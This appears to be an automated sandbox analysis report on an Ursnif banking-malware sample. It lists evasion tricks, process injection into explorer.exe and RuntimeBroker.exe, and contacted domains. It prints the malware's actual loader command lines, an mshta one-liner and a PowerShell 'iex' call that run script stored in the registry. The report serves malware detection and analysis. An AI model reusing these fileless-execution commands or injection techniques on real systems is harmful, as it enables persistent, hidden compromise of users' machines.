Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Uses ping.exe to sleep
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3376 Thread sleep time: -7378697629483816s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6332 Thread sleep count: 3419 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6332 Thread sleep count: 5432 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6320 Thread sleep time: -16602069666338586s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ebytp2em.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hiiw3gsl.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uio4qdnj.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hjljqxud.dll Jump to dropped file
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3911 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5235 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3419
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5432
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B6B4A5 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_00B6B4A5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B66467 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 0_2_00B66467
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B5BAF2 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_00B5BAF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0334BAF2 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 3_2_0334BAF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_03356467 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 3_2_03356467
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0335B4A5 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 3_2_0335B4A5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B52E19 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_00B52E19
Source: explorer.exe, 00000027.00000000.705856126.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000027.00000000.735751989.00000000047D0000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_SATA
Source: explorer.exe, 00000027.00000000.719678172.0000000008778000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 00000027.00000000.705856126.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: RuntimeBroker.exe, 00000031.00000000.776047119.000001B91D040000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000027.00000000.726075838.00000000067C2000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: explorer.exe, 00000027.00000000.705856126.00000000086C9000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1A1DE5 LoadLibraryA,GetProcAddress, 0_2_6E1A1DE5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B576B3 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 0_2_00B576B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_033476B3 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 3_2_033476B3

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 52.97.178.98 187 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 193.29.104.83 187 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 40.101.9.178 187 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: outlook.office365.com
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: www.outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 40.97.160.2 187 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: xereunrtol.website
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: zereunrtol.website
Maps a DLL or memory area into another process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Writes to foreign memory regions
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6DD8E12E0 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6DD8E12E0 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6DD8E12E0 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6DD8E12E0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 93C000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: AD0000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 940000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: D80000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2A20574000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1B91F360000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFC8DCB1580 protect: page execute and read and write
Allocates memory in foreign processes
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B91F360000 protect: page execute and read and write
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3352 base: 93C000 value: 00 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3352 base: AD0000 value: 80 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3352 base: 7FFC8DCB1580 value: 40 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3352 base: 940000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3352 base: D80000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3352 base: 7FFC8DCB1580 value: 40
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3352 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3352
Source: C:\Windows\explorer.exe Thread register set: target process: 4084
Source: C:\Windows\explorer.exe Thread register set: target process: 4176
Source: C:\Windows\explorer.exe Thread register set: target process: 4440
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 8DCB1580 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 8DCB1580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 8DCB1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 8DCB1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 8DCB1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 8DCB1580
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Edc0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Edc0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline' Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ebytp2em.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9EC1.tmp' 'c:\Users\user\AppData\Local\Temp\CSC494F2C58C9734FA38D9A23FE2A87D91.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB12F.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB0814D4E7B5456EB73AE824564C98E9.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB287.tmp' 'c:\Users\user\AppData\Local\Temp\CSCFBA5379BA96A41E2BDA53EBC60FE73A9.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC95B.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB67CC2333FCC4BD79D679F53D429B77D.TMP'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: loaddll32.exe, 00000000.00000002.822246268.0000000001C80000.00000002.00020000.sdmp, explorer.exe, 00000027.00000000.719201700.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000031.00000000.782765684.000001B91D590000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000027.00000000.717923899.0000000000B68000.00000004.00000020.sdmp Binary or memory string: Progman\Pr
Source: loaddll32.exe, 00000000.00000002.822246268.0000000001C80000.00000002.00020000.sdmp, explorer.exe, 00000027.00000000.719201700.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000031.00000000.782765684.000001B91D590000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.822246268.0000000001C80000.00000002.00020000.sdmp, explorer.exe, 00000027.00000000.719201700.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000031.00000000.782765684.000001B91D590000.00000002.00020000.sdmp Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.822246268.0000000001C80000.00000002.00020000.sdmp, explorer.exe, 00000027.00000000.719201700.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000031.00000000.782765684.000001B91D590000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000027.00000000.719678172.0000000008778000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndh

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B0A82B cpuid 0_2_00B0A82B
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B53E33 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 0_2_00B53E33
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1A1172 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 0_2_6E1A1172
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1A1825 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_6E1A1825
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B0A82B RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 0_2_00B0A82B

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.534061111.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.534116872.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.533922988.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.534170711.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.545735398.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.545790657.0000000005648000.00000004.00000040.sdmp, type: MEMORY
